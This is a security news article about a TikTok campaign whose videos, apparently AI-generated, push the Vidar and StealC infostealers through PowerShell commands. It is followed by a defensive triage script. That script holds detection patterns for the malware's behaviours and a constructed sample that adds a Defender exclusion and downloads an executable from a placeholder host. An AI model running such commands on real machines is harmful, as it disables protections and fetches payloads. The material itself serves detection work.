Malware Delivered Via AI-Generated TikTok Videos
In a recent development, a new malware campaign has been identified on TikTok, spreading information-stealing malware such as Vidar and StealC. The campaign, which operates entirely within the popular social media platform, has been traced to several accounts: @gitallowed, @zane.houghton, and @digitaldreams771. However, these accounts have since become inactive.
The malware chain begins with a script downloaded from allaivo[.me], which subsequently fetches and installs Vidar or StealC. The commands appear only in the video itself and are never embedded in post text or links, which makes them harder for traditional security systems to detect. This stealthy approach increases the risk that many users have inadvertently followed the instructions and infected their systems.
One video, which gained nearly 500,000 views and over 20,000 likes, instructed users to execute PowerShell commands. Those commands started the infection chain, turning viewers into unwitting participants in the malware installation. The videos from these accounts differed only slightly in camera angles and payload URLs, suggesting automation was used in their creation.
The malicious PowerShell script hides files in user directories, adds them to Windows Defender's exclusion list, downloads malware from amssh[.co], uses retry logic, sets up system persistence, cleans up forensic evidence, and masks its command-and-control (C2) infrastructure by embedding IP data in services like Steam and Telegram.
To counter this threat, organizations are advised to actively monitor social media platforms for high-engagement posts containing technical instructions, as these may be linked to malicious activity. Implementing behavioral detection tools is essential to flag unusual user actions, such as unexpected command-line executions.
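As an added illustration of the behavioral detection recommended above (not code from the Trend Micro advisory or the campaign), the following PowerShell triage script scores logged script blocks against the behaviours the article attributes to the malicious script and lists Defender exclusions under user profiles. It assumes Microsoft Defender and PowerShell Script Block Logging (event ID 4104) are enabled; the indicator names, patterns, threshold and sample text are this example's own constructions.

```powershell
# Added triage example; not code from the Trend Micro advisory or the campaign itself.
# Assumes Microsoft Defender and PowerShell Script Block Logging (event ID 4104) are enabled.
# Indicator names, patterns and the score threshold are this example's own choices.

# Behaviours the article attributes to the script, each mapped to a regex and a weight.
$Indicators = @(
    @{ Name = 'defender-exclusion'; Pattern = 'Add-MpPreference\s+-ExclusionPath'; Weight = 3 }
    @{ Name = 'hidden-file';        Pattern = 'attrib\s+\+h|FileAttributes\]::Hidden'; Weight = 1 }
    @{ Name = 'download';           Pattern = 'Invoke-WebRequest|DownloadString|\biwr\b'; Weight = 2 }
    @{ Name = 'retry-logic';        Pattern = 'Start-Sleep'; Weight = 1 }
    @{ Name = 'persistence';        Pattern = 'CurrentVersion\\Run|Register-ScheduledTask|schtasks'; Weight = 2 }
    @{ Name = 'anti-forensics';     Pattern = 'Clear-History|ConsoleHost_history|wevtutil\s+cl'; Weight = 2 }
)

function Get-ScriptBlockRisk {
    # Scores one script block; it is the combination of indicators that makes a block suspicious.
    param([Parameter(Mandatory)][string]$ScriptText)
    $hits = @($Indicators | Where-Object { $ScriptText -match $_.Pattern })
    [pscustomobject]@{
        Score = [int](($hits | Measure-Object -Property Weight -Sum).Sum)
        Hits  = @($hits | ForEach-Object { $_.Name })
    }
}

# Constructed sample standing in for a logged ScriptBlockText value (placeholder host, not a real URL).
$Sample = @'
Add-MpPreference -ExclusionPath "$env:APPDATA\svc"
Invoke-WebRequest -Uri "https://example.invalid/p" -OutFile "$env:APPDATA\svc\p.exe"
attrib +h "$env:APPDATA\svc"
'@
Get-ScriptBlockRisk -ScriptText $Sample

# 1. Hunt recent script-block events and surface those that combine several indicators.
$Threshold = 4
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
             -MaxEvents 2000 -ErrorAction SilentlyContinue |
    ForEach-Object {
        $text = [string]$_.Properties[2].Value   # ScriptBlockText field of event 4104
        $risk = Get-ScriptBlockRisk -ScriptText $text
        if ($risk.Score -ge $Threshold) {
            [pscustomobject]@{ Time = $_.TimeCreated; Score = $risk.Score; Hits = ($risk.Hits -join ', ') }
        }
    }

# 2. Defender exclusions pointing into user profiles: unusual on a managed host, and a trace
#    that survives even after the script has removed its other artifacts.
(Get-MpPreference).ExclusionPath | Where-Object { $_ -like "$env:SystemDrive\Users\*" }
```

Run it in an elevated session on the host being triaged; the exclusion check needs Defender's management cmdlets, and script-block events are only present if logging was on before the suspicious session.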
Moreover, user education must evolve to include guidance on recognizing and reporting deceptive video content, especially content that exploits social engineering tactics through visual and auditory cues. The popularity of the video underscores the need for updated defense strategies that go beyond traditional threat detection.
Trend Micro has issued an advisory on this latest social engineering effort, urging users to exercise caution when interacting with unfamiliar content on social media platforms. As always, it is crucial to maintain a robust security posture to protect against such threats.